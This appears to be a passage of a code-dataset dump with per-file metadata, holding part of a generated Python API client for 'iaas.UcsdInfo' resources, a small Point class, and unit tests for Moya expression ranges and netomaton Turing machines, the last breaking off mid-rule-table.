    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: tuple(IaasUcsdManagedInfra, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'moid',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_iaas_ucsd_managed_infra_by_moid" % key)
        local_var_params[key] = val
    del local_var_params['kwargs']

    # 'moid' is mandatory; fail fast when client-side validation is on.
    if self.api_client.client_side_validation and local_var_params.get(
            'moid') is None:
        raise ApiValueError(
            "Missing the required parameter `moid` when calling `get_iaas_ucsd_managed_infra_by_moid`"
        )  # noqa: E501

    collection_formats = {}
    path_params = {'Moid': local_var_params['moid']}
    query_params = []
    header_params = {
        'Accept': self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ]),
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

    return self.api_client.call_api(
        '/iaas/UcsdManagedInfras/{Moid}',
        'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IaasUcsdManagedInfra',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get(
            '_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_iaas_ucsd_managed_infra_list(self, **kwargs):  # noqa: E501
    """Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.get_iaas_ucsd_managed_infra_list(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str filter: OData $filter predicate selecting which resources to return.
    :param str orderby: Properties used to sort the collection of resources.
    :param int top: Maximum number of resources to return in the response.
    :param int skip: Number of resources to skip in the response.
    :param str select: Subset of properties to return.
    :param str expand: Additional attributes or related resources to return.
    :param str apply: Sequence of aggregation transformations ('aggregate',
        'groupby'), separated by forward slashes and applied in order.
    :param bool count: Return only the count of matching resources.
    :param str inlinecount: Request an inline count of matching resources
        alongside the resources in the response.
    :param str at: Filter on versioning-information properties; same
        expression grammar as $filter.
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: IaasUcsdManagedInfraList
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers want only the deserialized body, not
    # the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    return self.get_iaas_ucsd_managed_infra_list_with_http_info(**kwargs)
def get_iaas_ucsd_managed_infra_list_with_http_info(self, **kwargs):  # noqa: E501
    """Read a 'iaas.UcsdManagedInfra' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.get_iaas_ucsd_managed_infra_list_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str filter: OData $filter predicate selecting which resources to return.
    :param str orderby: Properties used to sort the collection of resources.
    :param int top: Maximum number of resources to return in the response.
    :param int skip: Number of resources to skip in the response.
    :param str select: Subset of properties to return.
    :param str expand: Additional attributes or related resources to return.
    :param str apply: Sequence of aggregation transformations ('aggregate',
        'groupby'), separated by forward slashes and applied in order.
    :param bool count: Return only the count of matching resources.
    :param str inlinecount: Request an inline count of matching resources
        alongside the resources in the response.
    :param str at: Filter on versioning-information properties; same
        expression grammar as $filter.
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: tuple(IaasUcsdManagedInfraList, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    local_var_params = locals()

    # Endpoint-specific query options plus the request-control keywords
    # common to every generated operation.
    all_params = [
        'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
        'count', 'inlinecount', 'at',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_iaas_ucsd_managed_infra_list" % key)
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}
    path_params = {}

    # Map keyword arguments onto their wire-format query names; 'at' is
    # the only option without the OData '$' prefix.
    query_params = []
    for arg_name, wire_name in (
            ('filter', '$filter'), ('orderby', '$orderby'),
            ('top', '$top'), ('skip', '$skip'),
            ('select', '$select'), ('expand', '$expand'),
            ('apply', '$apply'), ('count', '$count'),
            ('inlinecount', '$inlinecount'), ('at', 'at')):
        if local_var_params.get(arg_name) is not None:
            query_params.append((wire_name, local_var_params[arg_name]))

    header_params = {
        'Accept': self.api_client.select_header_accept([
            'application/json', 'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ]),
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

    return self.api_client.call_api(
        '/iaas/UcsdManagedInfras',
        'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IaasUcsdManagedInfraList',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get(
            '_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def patch_iaas_ucsd_info(self, moid, iaas_ucsd_info, **kwargs):  # noqa: E501
    """Update a 'iaas.UcsdInfo' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.patch_iaas_ucsd_info(moid, iaas_ucsd_info, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: IaasUcsdInfo
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers want only the deserialized body, not
    # the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    return self.patch_iaas_ucsd_info_with_http_info(
        moid, iaas_ucsd_info, **kwargs)
def patch_iaas_ucsd_info_with_http_info(self, moid, iaas_ucsd_info, **kwargs):  # noqa: E501
    """Update a 'iaas.UcsdInfo' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.patch_iaas_ucsd_info_with_http_info(moid, iaas_ucsd_info, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: tuple(IaasUcsdInfo, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'moid', 'iaas_ucsd_info',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError("Got an unexpected keyword argument '%s'"
                               " to method patch_iaas_ucsd_info" % key)
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Both the path identifier and the request body are mandatory; fail
    # fast when client-side validation is on.
    if self.api_client.client_side_validation:
        if local_var_params.get('moid') is None:
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `patch_iaas_ucsd_info`"
            )  # noqa: E501
        if local_var_params.get('iaas_ucsd_info') is None:
            raise ApiValueError(
                "Missing the required parameter `iaas_ucsd_info` when calling `patch_iaas_ucsd_info`"
            )  # noqa: E501

    collection_formats = {}
    path_params = {'Moid': local_var_params['moid']}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = local_var_params['iaas_ucsd_info']

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json', 'application/json-patch+json']),
    }

    # Authentication setting
    auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

    return self.api_client.call_api(
        '/iaas/UcsdInfos/{Moid}',
        'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IaasUcsdInfo',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get(
            '_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_iaas_ucsd_info(self, moid, iaas_ucsd_info, **kwargs):  # noqa: E501
    """Update a 'iaas.UcsdInfo' resource. # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread back instead of the result.

    >>> thread = api.update_iaas_ucsd_info(moid, iaas_ucsd_info, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str moid: The unique Moid identifier of a resource instance. (required)
    :param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        without reading/decoding. Default is True.
    :param _request_timeout: total timeout for this request, or a
        (connection, read) timeout pair.
    :return: IaasUcsdInfo
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers want only the deserialized body, not
    # the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    return self.update_iaas_ucsd_info_with_http_info(
        moid, iaas_ucsd_info, **kwargs)
    def update_iaas_ucsd_info_with_http_info(self, moid, iaas_ucsd_info,
                                             **kwargs):  # noqa: E501
        """Update a 'iaas.UcsdInfo' resource. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_iaas_ucsd_info_with_http_info(moid, iaas_ucsd_info, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param IaasUcsdInfo iaas_ucsd_info: The 'iaas.UcsdInfo' resource to update. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(IaasUcsdInfo, status_code(int), headers(HTTPHeaderDict))
            If the method is called asynchronously,
            returns the request thread.
        """
        # locals() must be captured first so it contains exactly the call
        # arguments (moid, iaas_ucsd_info, kwargs) and nothing else.
        local_var_params = locals()
        all_params = ['moid', 'iaas_ucsd_info']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject unknown keyword arguments, then flatten **kwargs into
        # local_var_params so every parameter is looked up uniformly below.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method update_iaas_ucsd_info" % key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `update_iaas_ucsd_info`"
            )  # noqa: E501
        # verify the required parameter 'iaas_ucsd_info' is set
        if self.api_client.client_side_validation and (
                'iaas_ucsd_info' not in local_var_params or  # noqa: E501
                local_var_params['iaas_ucsd_info'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `iaas_ucsd_info` when calling `update_iaas_ucsd_info`"
            )  # noqa: E501
        collection_formats = {}
        # 'moid' is interpolated into the request path as {Moid}.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The resource itself is sent as the JSON request body.
        body_params = None
        if 'iaas_ucsd_info' in local_var_params:
            body_params = local_var_params['iaas_ucsd_info']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501
        # NOTE(review): this "update" endpoint uses POST while the patch_*
        # variant above uses PATCH — this looks like the generated SDK's
        # deliberate convention; confirm against the API spec.
        return self.api_client.call_api(
            '/iaas/UcsdInfos/{Moid}',
            'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IaasUcsdInfo',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
| 63.592504
| 1,389
| 0.65277
| 16,372
| 132,336
| 5.110494
| 0.026325
| 0.03576
| 0.05756
| 0.015681
| 0.975654
| 0.975319
| 0.974937
| 0.974447
| 0.972762
| 0.971997
| 0
| 0.011153
| 0.283173
| 132,336
| 2,080
| 1,390
| 63.623077
| 0.870855
| 0.577976
| 0
| 0.8829
| 0
| 0
| 0.174017
| 0.056257
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02881
| false
| 0
| 0.004647
| 0
| 0.062268
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be865b60b1a3ac8f90f876232e371d4f1d737748
| 144
|
py
|
Python
|
src/point.py
|
Felieton/GeneticAlgorithm
|
f881f8ee68e3d48b8ad3054dd18208f8ac04a3c8
|
[
"MIT"
] | 1
|
2021-03-16T19:47:16.000Z
|
2021-03-16T19:47:16.000Z
|
src/point.py
|
Felieton/GeneticAlgorithm
|
f881f8ee68e3d48b8ad3054dd18208f8ac04a3c8
|
[
"MIT"
] | null | null | null |
src/point.py
|
Felieton/GeneticAlgorithm
|
f881f8ee68e3d48b8ad3054dd18208f8ac04a3c8
|
[
"MIT"
] | null | null | null |
class Point:
    """A simple 2-D point with ``x`` and ``y`` coordinates.

    Coordinates are stored exactly as given (no type coercion).
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __str__(self):
        # Display form used elsewhere in the project: '(x, y)'.
        return f'({self.x}, {self.y})'

    def __repr__(self):
        # Unambiguous form for debugging; __str__ keeps the original
        # '(x, y)' display unchanged.
        return f'Point(x={self.x!r}, y={self.y!r})'
| 18
| 38
| 0.486111
| 22
| 144
| 2.818182
| 0.454545
| 0.241935
| 0.193548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.347222
| 144
| 7
| 39
| 20.571429
| 0.659574
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
bea67e69ae54228897fd3b831ebbcd0022c27df1
| 5,481
|
py
|
Python
|
moya/tests/test_expressionrange.py
|
moyaproject/moya
|
78b91d87b4519f91dfdd2b40dab44e72f201a843
|
[
"MIT"
] | 129
|
2015-02-16T12:02:50.000Z
|
2021-11-06T00:20:01.000Z
|
moya/tests/test_expressionrange.py
|
liaohandel/moya
|
78b91d87b4519f91dfdd2b40dab44e72f201a843
|
[
"MIT"
] | 5
|
2015-02-19T15:56:41.000Z
|
2015-09-08T18:58:35.000Z
|
moya/tests/test_expressionrange.py
|
liaohandel/moya
|
78b91d87b4519f91dfdd2b40dab44e72f201a843
|
[
"MIT"
] | 14
|
2015-02-19T17:20:34.000Z
|
2022-03-28T01:38:09.000Z
|
import unittest
from moya.context import Context
from moya.context.expressionrange import *
class TestExpressionRange(unittest.TestCase):
    """Tests for the inclusive/exclusive integer and character ranges.

    Each case checks iteration order, length, membership, list
    concatenation from either side, and the keys()/values()/items()
    mapping protocol, for both ascending and descending ranges.
    """

    def test_exclusive_integer(self):
        c = Context()
        r = ExclusiveIntegerRange(c, 2, 4)
        self.assertEqual(list(r), [2, 3])
        self.assertEqual(len(r), 2)
        # assertTrue replaces the assert_ alias, which is deprecated and
        # removed in Python 3.12.
        self.assertTrue(1 not in r)
        self.assertTrue(2 in r)
        self.assertTrue(3 in r)
        self.assertTrue(4 not in r)
        self.assertEqual(r + 5, [2, 3, 5])
        self.assertEqual(5 + r, [5, 2, 3])
        self.assertEqual(list(r.keys()), [0, 1])
        self.assertEqual(list(r.values()), [2, 3])
        # list() wrapper added for consistency with every other items() check
        self.assertEqual(list(r.items()), [(0, 2), (1, 3)])
        self.assertEqual(r[0], 2)
        self.assertEqual(r[1], 3)

        # Descending range: end-exclusive from the low side.
        r = ExclusiveIntegerRange(c, 4, 2)
        self.assertEqual(len(r), 2)
        self.assertEqual(list(r), [4, 3])
        self.assertTrue(1 not in r)
        self.assertTrue(2 not in r)
        self.assertTrue(3 in r)
        self.assertTrue(4 in r)
        self.assertTrue(5 not in r)
        self.assertEqual(r + 5, [4, 3, 5])
        self.assertEqual(5 + r, [5, 4, 3])
        self.assertEqual(list(r.keys()), [0, 1])
        self.assertEqual(list(r.values()), [4, 3])
        self.assertEqual(list(r.items()), [(0, 4), (1, 3)])
        self.assertEqual(r[0], 4)
        self.assertEqual(r[1], 3)

    def test_inclusive_integer(self):
        c = Context()
        r = InclusiveIntegerRange(c, 2, 4)
        self.assertEqual(list(r), [2, 3, 4])
        self.assertEqual(len(r), 3)
        self.assertTrue(1 not in r)
        self.assertTrue(2 in r)
        self.assertTrue(3 in r)
        self.assertTrue(4 in r)
        self.assertTrue(5 not in r)
        self.assertEqual(r + 5, [2, 3, 4, 5])
        self.assertEqual(5 + r, [5, 2, 3, 4])
        self.assertEqual(list(r.keys()), [0, 1, 2])
        self.assertEqual(list(r.values()), [2, 3, 4])
        self.assertEqual(list(r.items()), [(0, 2), (1, 3), (2, 4)])
        self.assertEqual(r[0], 2)
        self.assertEqual(r[1], 3)
        self.assertEqual(r[2], 4)

        r = InclusiveIntegerRange(c, 4, 2)
        self.assertEqual(list(r), [4, 3, 2])
        self.assertEqual(len(r), 3)
        self.assertTrue(1 not in r)
        self.assertTrue(2 in r)
        self.assertTrue(3 in r)
        self.assertTrue(4 in r)
        self.assertTrue(5 not in r)
        self.assertEqual(r + 5, [4, 3, 2, 5])
        self.assertEqual(5 + r, [5, 4, 3, 2])
        self.assertEqual(list(r.keys()), [0, 1, 2])
        self.assertEqual(list(r.values()), [4, 3, 2])
        self.assertEqual(list(r.items()), [(0, 4), (1, 3), (2, 2)])
        self.assertEqual(r[0], 4)
        self.assertEqual(r[1], 3)
        self.assertEqual(r[2], 2)

    def test_exclusive_character(self):
        c = Context()
        r = ExclusiveCharacterRange(c, "b", "d")
        self.assertEqual(list(r), ["b", "c"])
        self.assertEqual(len(r), 2)
        self.assertTrue("a" not in r)
        self.assertTrue("b" in r)
        self.assertTrue("c" in r)
        self.assertTrue("d" not in r)
        self.assertEqual(r + "e", ["b", "c", "e"])
        self.assertEqual("e" + r, ["e", "b", "c"])
        self.assertEqual(list(r.keys()), [0, 1])
        self.assertEqual(list(r.values()), ["b", "c"])
        self.assertEqual(list(r.items()), [(0, "b"), (1, "c")])
        self.assertEqual(r[0], "b")
        self.assertEqual(r[1], "c")

        r = ExclusiveCharacterRange(c, "d", "b")
        self.assertEqual(list(r), ["d", "c"])
        self.assertEqual(len(r), 2)
        self.assertTrue("a" not in r)
        self.assertTrue("b" not in r)
        self.assertTrue("c" in r)
        self.assertTrue("d" in r)
        self.assertTrue("e" not in r)
        self.assertEqual(r + "e", ["d", "c", "e"])
        self.assertEqual("e" + r, ["e", "d", "c"])
        self.assertEqual(list(r.keys()), [0, 1])
        self.assertEqual(list(r.values()), ["d", "c"])
        self.assertEqual(list(r.items()), [(0, "d"), (1, "c")])
        self.assertEqual(r[0], "d")
        self.assertEqual(r[1], "c")

    def test_inclusive_character(self):
        c = Context()
        r = InclusiveCharacterRange(c, "b", "d")
        self.assertEqual(list(r), ["b", "c", "d"])
        self.assertEqual(len(r), 3)
        self.assertTrue("a" not in r)
        self.assertTrue("b" in r)
        self.assertTrue("c" in r)
        self.assertTrue("d" in r)
        self.assertTrue("e" not in r)
        self.assertEqual(r + "e", ["b", "c", "d", "e"])
        self.assertEqual("e" + r, ["e", "b", "c", "d"])
        self.assertEqual(list(r.keys()), [0, 1, 2])
        self.assertEqual(list(r.values()), ["b", "c", "d"])
        self.assertEqual(list(r.items()), [(0, "b"), (1, "c"), (2, "d")])
        self.assertEqual(r[0], "b")
        self.assertEqual(r[1], "c")
        self.assertEqual(r[2], "d")

        r = InclusiveCharacterRange(c, "d", "b")
        self.assertEqual(list(r), ["d", "c", "b"])
        self.assertEqual(len(r), 3)
        self.assertTrue("a" not in r)
        self.assertTrue("b" in r)
        self.assertTrue("c" in r)
        self.assertTrue("d" in r)
        self.assertTrue("e" not in r)
        self.assertEqual(r + "e", ["d", "c", "b", "e"])
        self.assertEqual("e" + r, ["e", "d", "c", "b"])
        self.assertEqual(list(r.keys()), [0, 1, 2])
        self.assertEqual(list(r.values()), ["d", "c", "b"])
        self.assertEqual(list(r.items()), [(0, "d"), (1, "c"), (2, "b")])
        self.assertEqual(r[0], "d")
        self.assertEqual(r[1], "c")
        self.assertEqual(r[2], "b")
| 38.0625
| 73
| 0.51195
| 803
| 5,481
| 3.437111
| 0.051059
| 0.413043
| 0.096377
| 0.224638
| 0.859058
| 0.821739
| 0.807971
| 0.768478
| 0.709058
| 0.548188
| 0
| 0.043269
| 0.278964
| 5,481
| 143
| 74
| 38.328671
| 0.655111
| 0
| 0
| 0.522388
| 0
| 0
| 0.018792
| 0
| 0
| 0
| 0
| 0
| 0.850746
| 1
| 0.029851
| false
| 0
| 0.022388
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bea731fba372e2c93f77efb4d6d72392e171460b
| 18,938
|
py
|
Python
|
tests/test_turing_machine.py
|
lantunes/netomaton
|
fef60a787d031c9c7b1eb4ff990f7c12145579ef
|
[
"Apache-2.0"
] | 35
|
2018-12-07T14:11:29.000Z
|
2022-03-17T23:47:21.000Z
|
tests/test_turing_machine.py
|
lantunes/netomaton
|
fef60a787d031c9c7b1eb4ff990f7c12145579ef
|
[
"Apache-2.0"
] | 2
|
2020-03-15T06:45:39.000Z
|
2020-04-15T23:50:13.000Z
|
tests/test_turing_machine.py
|
lantunes/netomaton
|
fef60a787d031c9c7b1eb4ff990f7c12145579ef
|
[
"Apache-2.0"
] | 6
|
2019-10-18T08:47:32.000Z
|
2022-03-02T10:17:12.000Z
|
import netomaton as ntm
from netomaton import TuringMachine, HeadCentricTuringMachine, TapeCentricTuringMachine
from .rule_test import *
class TestTuringMachine(RuleTest):
    """Tests for the head-centric and tape-centric Turing machine adapters.

    The same three machines are exercised once through
    HeadCentricTuringMachine (tests 1, 1b, 1c) and once through
    TapeCentricTuringMachine (tests 2, 2b, 2c).  Their rule tables were
    previously duplicated verbatim between the two variants; they are now
    built once each by the _*_machine helpers below.
    """

    @staticmethod
    def _onoff_machine():
        """Build the 2-state machine over an on/off tape.

        Returns (HEAD, CELL, rule_table); shared by tests 1 and 2.
        """
        HEAD = {"up": 1, "down": 2}
        CELL = {"on": 1, "off": 0}
        rule_table = {
            HEAD['up']: {
                CELL['on']: [HEAD['up'], CELL['off'], TuringMachine.RIGHT],
                CELL['off']: [HEAD['down'], CELL['on'], TuringMachine.RIGHT]
            },
            HEAD['down']: {
                CELL['on']: [HEAD['up'], CELL['on'], TuringMachine.LEFT],
                CELL['off']: [HEAD['down'], CELL['on'], TuringMachine.LEFT]
            }
        }
        return HEAD, CELL, rule_table

    @staticmethod
    def _abc_machine():
        """Build the 7-state machine over the {a,b,c,x,y,z,blank} alphabet.

        Returns (HEAD, CELL, rule_table); shared by tests 1b and 2b.
        q6 is the terminating (do-nothing) state.  NOTE(review): the
        x/y/z marking pattern suggests this recognizes a^n b^n c^n —
        confirm before relying on that description.
        """
        HEAD = {"q0": 0, "q1": 1, "q2": 2, "q3": 3, "q4": 4, "q5": 5, "q6": 6}
        CELL = {" ": 0, "a": 1, "b": 2, "c": 3, "x": 4, "y": 5, "z": 6}
        rule_table = {
            HEAD['q0']: {
                CELL['a']: [HEAD['q1'], CELL['x'], TuringMachine.RIGHT],
                CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
                CELL['y']: [HEAD['q4'], CELL['y'], TuringMachine.LEFT],
                CELL['b']: [HEAD['q0'], CELL['b'], TuringMachine.STAY],
                CELL['c']: [HEAD['q0'], CELL['c'], TuringMachine.STAY],
                CELL['x']: [HEAD['q0'], CELL['x'], TuringMachine.STAY],
                CELL['z']: [HEAD['q0'], CELL['z'], TuringMachine.STAY],
            },
            HEAD['q1']: {
                CELL['b']: [HEAD['q2'], CELL['y'], TuringMachine.RIGHT],
                CELL['y']: [HEAD['q1'], CELL['y'], TuringMachine.RIGHT],
                CELL['a']: [HEAD['q1'], CELL['a'], TuringMachine.RIGHT],
                CELL['c']: [HEAD['q1'], CELL['c'], TuringMachine.STAY],
                CELL['x']: [HEAD['q1'], CELL['x'], TuringMachine.STAY],
                CELL['z']: [HEAD['q1'], CELL['z'], TuringMachine.STAY],
                CELL[' ']: [HEAD['q1'], CELL[' '], TuringMachine.STAY],
            },
            HEAD['q2']: {
                CELL['c']: [HEAD['q3'], CELL['z'], TuringMachine.LEFT],
                CELL['z']: [HEAD['q2'], CELL['z'], TuringMachine.RIGHT],
                CELL['b']: [HEAD['q2'], CELL['b'], TuringMachine.RIGHT],
                CELL['a']: [HEAD['q2'], CELL['a'], TuringMachine.STAY],
                CELL['x']: [HEAD['q2'], CELL['x'], TuringMachine.STAY],
                CELL['y']: [HEAD['q2'], CELL['y'], TuringMachine.STAY],
                CELL[' ']: [HEAD['q2'], CELL[' '], TuringMachine.STAY],
            },
            HEAD['q3']: {
                CELL['x']: [HEAD['q0'], CELL['x'], TuringMachine.RIGHT],
                CELL['a']: [HEAD['q3'], CELL['a'], TuringMachine.LEFT],
                CELL['b']: [HEAD['q3'], CELL['b'], TuringMachine.LEFT],
                CELL['z']: [HEAD['q3'], CELL['z'], TuringMachine.LEFT],
                CELL['y']: [HEAD['q3'], CELL['y'], TuringMachine.LEFT],
                CELL['c']: [HEAD['q3'], CELL['c'], TuringMachine.STAY],
                CELL[' ']: [HEAD['q3'], CELL[' '], TuringMachine.STAY]
            },
            HEAD['q4']: {
                CELL[' ']: [HEAD['q5'], CELL[' '], TuringMachine.RIGHT],
                CELL['x']: [HEAD['q4'], CELL['x'], TuringMachine.LEFT],
                CELL['a']: [HEAD['q4'], CELL['a'], TuringMachine.STAY],
                CELL['b']: [HEAD['q4'], CELL['b'], TuringMachine.STAY],
                CELL['c']: [HEAD['q4'], CELL['c'], TuringMachine.STAY],
                CELL['y']: [HEAD['q4'], CELL['y'], TuringMachine.STAY],
                CELL['z']: [HEAD['q4'], CELL['z'], TuringMachine.STAY]
            },
            HEAD['q5']: {
                CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
                CELL['x']: [HEAD['q5'], CELL['x'], TuringMachine.RIGHT],
                CELL['y']: [HEAD['q5'], CELL['y'], TuringMachine.RIGHT],
                CELL['z']: [HEAD['q5'], CELL['z'], TuringMachine.RIGHT],
                CELL['a']: [HEAD['q5'], CELL['a'], TuringMachine.STAY],
                CELL['b']: [HEAD['q5'], CELL['b'], TuringMachine.STAY],
                CELL['c']: [HEAD['q5'], CELL['c'], TuringMachine.STAY]
            },
            HEAD['q6']: {
